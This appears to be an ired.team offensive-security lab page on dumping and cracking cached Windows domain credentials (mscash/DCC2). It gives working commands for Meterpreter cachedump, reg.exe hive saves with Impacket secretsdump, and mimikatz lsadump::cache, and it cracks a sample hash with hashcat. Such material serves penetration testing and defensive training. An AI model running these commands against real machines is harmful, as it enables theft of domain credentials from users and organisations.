> For the complete documentation index, see [llms.txt](https://www.ired.team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials.md).

# Dumping and Cracking mscash - Cached Domain Credentials

This lab focuses on dumping and cracking mscash hashes after SYSTEM level privileges has been obtained on a compromised machine.

`Mscash` is a Microsoft hashing algorithm that is used for storing cached domain credentials locally on a system after a successful logon. It's worth noting that cached credentials do not expire. Domain credentials are cached on a local system so that domain members can logon to the machine even if the DC is down. It's worth noting that mscash hash is not passable - i.e PTH attacks will not work.

## Execution

### Meterpreter

Note that in meterpreter session, hashdump only dumps the local SAM account hashes:

{% code title="attacker\@kali" %}

```
hashdump
```

{% endcode %}

![](/files/-LXivyhGJHpKRPR4h73h)

To dump cached domain credentials in mscash format, use a post exploitation module `cachedump`:

{% code title="attacker\@kali" %}

```csharp
getuid
getsystem
use post/windows/gather/cachedump
run
```

{% endcode %}

![](/files/-LXiw5Go4fu4Vcnob9Uy)

### Secretsdump

Impacket's secrestdump tool allows us to dump all the credentials that are stored in registry hives SAM, SECURITY and SYSTEM, so firstly, we need to write those out:

{% code title="attacker\@victim" %}

```csharp
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save
```

{% endcode %}

![](/files/-LXiw3SYy3mSVrZmHgPH)

Once the hives are retrieved, they can can be pulled back to kali linux to extract the hashes:

{% code title="attacker\@kali" %}

```csharp
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
```

{% endcode %}

![](/files/-LXiw1AAfqtOk23kXPEE)

### Mimikatz

```
lsadump::cache
```

![](/files/-L_nanb0R9YzT3M5jt79)

## Cracking mscash / mscache with HashCat

To crack mscache with hashcat, it should be in the following format:

```csharp
$DCC2$10240#username#hash
```

Meterpreter's cachedump module's output cannot be used in hashcat directly, but it's easy to do it.

Below shows the original output format from cachedump and the format accepted by hashcat:

```csharp
echo ; cat hashes.txt ; echo ; cut -d ":" -f 2 hashes.txt
```

![](/files/-LXj7YOsKWsdgdM5fzlh)

Let's try cracking it with hashchat now:

{% code title="attacker\@kali" %}

```csharp
hashcat -m2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --potfile-disable
```

{% endcode %}

![](/files/-LXj8L1k7_pE819ZOdkz)

## Where Are Domain Credentials Cached

This can be seen via regedit (running with SYSTEM privileges) in the following key:

```
HKEY_LOCAL_MACHINE\SECURITY\Cache
```

`NL$1..10` are the cached hashes for 10 previously logged users:

![](/files/-LXj9fWFy0IGJh8fDmiu)

By nulling out the Data fields one could remove the credentials from cache. Once cached credentials are removed, if no DC is present, a user trying to authenticate to the system will see:

![](/files/-LXjBFj7u0eKZVmmxgXM)

## References

{% embed url="<https://webstersprodigy.net/2014/02/03/mscash-hash-primer-for-pentesters/>" %}

{% embed url="<https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/>" %}
